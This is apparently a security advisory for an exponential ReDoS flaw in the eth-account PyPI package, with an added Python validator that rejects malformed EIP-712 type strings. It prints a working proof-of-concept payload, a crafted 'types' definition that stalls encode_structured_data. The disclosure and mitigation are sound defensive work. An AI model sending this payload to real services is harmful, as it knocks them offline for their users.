Exponential ReDoS in eth-account leads to denial of service
Affected package: eth-account (PyPI), versions before 0.5.9; fixed in 0.5.9
An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the eth-account PyPI package when an attacker is able to supply arbitrary input to the encode_structured_data method, for example the following structured-data "types" definition:
{
  "types": {
    "EIP712Domain": [
      {"name": "aaaa", "type": "$[11111111111111111111111110"},
      {"name": "version", "type": "string"},
      {"name": "chainId", "type": "uint256"},
      {"name": "verifyingContract", "type": "address"}
    ]
  }
}
No mitigations are supplied for this issue.
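As an added example (not eth-account's own code), a linear-time pre-validation of the "types" block that rejects the payload above before it reaches any regex; the accepted type grammar (an identifier followed by optional `[]` or `[N]` suffixes, with `$` permitted in identifiers) is an assumption rather than eth-account's exact rule.

```python
# Added example (not eth-account's code): a linear-time pre-check for EIP-712
# type strings, so the advisory's payload is rejected before it reaches any
# backtracking regex. Accepted grammar (an assumption): identifier ("[" digits? "]")*
# where identifier starts with a letter, "_" or "$", and digits have no leading zero.
from typing import Dict, List, Tuple

IDENT_START = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_$")
DIGITS = set("0123456789")
IDENT_REST = IDENT_START | DIGITS

def is_valid_type_string(type_str: str, max_len: int = 256) -> bool:
    """One forward pass, no backtracking: cost is linear in len(type_str)."""
    if not type_str or len(type_str) > max_len or type_str[0] not in IDENT_START:
        return False
    i, n = 1, len(type_str)
    while i < n and type_str[i] in IDENT_REST:
        i += 1
    while i < n:  # zero or more array suffixes: "[]" or "[<positive integer>]"
        if type_str[i] != "[":
            return False
        i += 1
        start = i
        while i < n and type_str[i] in DIGITS:
            i += 1
        digits = type_str[start:i]
        if digits and digits[0] == "0":  # reject "[0]" and leading zeros
            return False
        if i >= n or type_str[i] != "]":  # unterminated "[": the payload fails here
            return False
        i += 1
    return True

def find_invalid_types(types: Dict[str, List[Dict[str, str]]]) -> List[Tuple[str, str, str]]:
    """Return (struct, field, type) for every field whose type string is rejected."""
    bad = []
    for struct_name, fields in types.items():
        for field in fields:
            t = field.get("type", "")
            if not is_valid_type_string(t):
                bad.append((struct_name, field.get("name", ""), t))
    return bad

# Constructed sample: the advisory's payload next to well-formed domain fields.
SAMPLE_TYPES = {"EIP712Domain": [
    {"name": "aaaa", "type": "$[11111111111111111111111110"},
    {"name": "version", "type": "string"},
    {"name": "chainId", "type": "uint256"},
    {"name": "verifyingContract", "type": "address"},
]}
```

Because the scan never backtracks, a digit run hundreds of characters long costs the same per character as the short payload above; on unpatched versions this is a guard placed in front of encode_structured_data, not a substitute for upgrading to 0.5.9.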